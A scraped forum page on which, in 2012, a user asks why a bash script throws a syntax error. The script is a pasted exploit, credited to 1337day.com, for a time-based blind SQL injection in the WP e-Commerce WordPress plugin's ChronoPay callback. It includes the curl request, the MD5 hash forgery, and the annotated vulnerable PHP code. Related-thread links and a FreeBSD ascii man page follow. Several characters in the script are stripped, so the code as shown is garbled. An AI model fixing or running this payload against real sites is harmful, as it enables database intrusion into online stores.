Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Syntax error near unexpected token `('
Top Forums Shell Programming and Scripting Syntax error near unexpected token `(' Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Old 05-02-2012
Syntax error near unexpected token `('
What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this-load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
.wp-e-commercewpsc-corewpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . 'wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
            }
 
 
.wp-e-commercewpsc-merchantschronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings-Payments-General Settings-
               Chronopay-Edit-Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill'
                        $wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
                                            `processed` = '2',
                                            `transactid` = '.$transaction_id.',
                                            `date` = '.time().'
                                        WHERE `sessionid` = .$sessionid. LIMIT 1);
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
 

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

8. How to Post in the The UNIX and Linux Forums

Syntax error near unexpected token `('

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

9. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

10. Ubuntu

Syntax error near unexpected token `('

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies

LEARN ABOUT FREEBSD

ascii

ASCII(7)					       BSD Miscellaneous Information Manual						  ASCII(7)

NAME

     ascii -- octal, hexadecimal and decimal ASCII character sets

DESCRIPTION

     The octal set:

     000 NUL  001 SOH  002 STX	003 ETX  004 EOT  005 ENQ  006 ACK  007 BEL
     010 BS   011 HT   012 NL	013 VT	 014 NP   015 CR   016 SO   017 SI
     020 DLE  021 DC1  022 DC2	023 DC3  024 DC4  025 NAK  026 SYN  027 ETB
     030 CAN  031 EM   032 SUB	033 ESC  034 FS   035 GS   036 RS   037 US
     040 SP   041  !   042  "	043  #	 044  $   045  %   046	&   047  '
     050  (   051  )   052  *	053  +	 054  ,   055  -   056	.   057  /
     060  0   061  1   062  2	063  3	 064  4   065  5   066	6   067  7
     070  8   071  9   072  :	073  ;	 074  <   075  =   076	>   077  ?
     100  @   101  A   102  B	103  C	 104  D   105  E   106	F   107  G
     110  H   111  I   112  J	113  K	 114  L   115  M   116	N   117  O
     120  P   121  Q   122  R	123  S	 124  T   125  U   126	V   127  W
     130  X   131  Y   132  Z	133  [	 134     135  ]   136	^   137  _
     140  `   141  a   142  b	143  c	 144  d   145  e   146	f   147  g
     150  h   151  i   152  j	153  k	 154  l   155  m   156	n   157  o
     160  p   161  q   162  r	163  s	 164  t   165  u   166	v   167  w
     170  x   171  y   172  z	173  {	 174  |   175  }   176	~   177 DEL

     The hexadecimal set:

     00 NUL   01 SOH   02 STX	03 ETX	 04 EOT   05 ENQ   06 ACK   07 BEL
     08 BS    09 HT    0A NL	0B VT	 0C NP	  0D CR    0E SO    0F SI
     10 DLE   11 DC1   12 DC2	13 DC3	 14 DC4   15 NAK   16 SYN   17 ETB
     18 CAN   19 EM    1A SUB	1B ESC	 1C FS	  1D GS    1E RS    1F US
     20 SP    21  !    22  "	23  #	 24  $	  25  %    26  &    27	'
     28  (    29  )    2a  *	2b  +	 2c  ,	  2d  -    2e  .    2f	/
     30  0    31  1    32  2	33  3	 34  4	  35  5    36  6    37	7
     38  8    39  9    3a  :	3b  ;	 3c  <	  3d  =    3e  >    3f	?
     40  @    41  A    42  B	43  C	 44  D	  45  E    46  F    47	G
     48  H    49  I    4a  J	4b  K	 4c  L	  4d  M    4e  N    4f	O
     50  P    51  Q    52  R	53  S	 54  T	  55  U    56  V    57	W
     58  X    59  Y    5a  Z	5b  [	 5c  	  5d  ]    5e  ^    5f	_
     60  `    61  a    62  b	63  c	 64  d	  65  e    66  f    67	g
     68  h    69  i    6a  j	6b  k	 6c  l	  6d  m    6e  n    6f	o
     70  p    71  q    72  r	73  s	 74  t	  75  u    76  v    77	w
     78  x    79  y    7a  z	7b  {	 7c  |	  7d  }    7e  ~    7f DEL

     The decimal set:

       0 NUL	1 SOH	 2 STX	  3 ETX    4 EOT    5 ENQ    6 ACK    7 BEL
       8 BS	9 HT	10 NL	 11 VT	  12 NP    13 CR    14 SO    15 SI
      16 DLE   17 DC1	18 DC2	 19 DC3   20 DC4   21 NAK   22 SYN   23 ETB
      24 CAN   25 EM	26 SUB	 27 ESC   28 FS    29 GS    30 RS    31 US
      32 SP    33  !	34  "	 35  #	  36  $    37  %    38	&    39  '
      40  (    41  )	42  *	 43  +	  44  ,    45  -    46	.    47  /
      48  0    49  1	50  2	 51  3	  52  4    53  5    54	6    55  7
      56  8    57  9	58  :	 59  ;	  60  <    61  =    62	>    63  ?
      64  @    65  A	66  B	 67  C	  68  D    69  E    70	F    71  G
      72  H    73  I	74  J	 75  K	  76  L    77  M    78	N    79  O
      80  P    81  Q	82  R	 83  S	  84  T    85  U    86	V    87  W
      88  X    89  Y	90  Z	 91  [	  92      93  ]    94	^    95  _
      96  `    97  a	98  b	 99  c	 100  d   101  e   102	f   103  g
     104  h   105  i   106  j	107  k	 108  l   109  m   110	n   111  o
     112  p   113  q   114  r	115  s	 116  t   117  u   118	v   119  w
     120  x   121  y   122  z	123  {	 124  |   125  }   126	~   127 DEL

FILES

     /usr/share/misc/ascii

HISTORY

     An ascii manual page appeared in Version 7 AT&T UNIX.

BSD
								   June 5, 1993 							       BSD
All times are GMT -4. The time now is 07:20 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy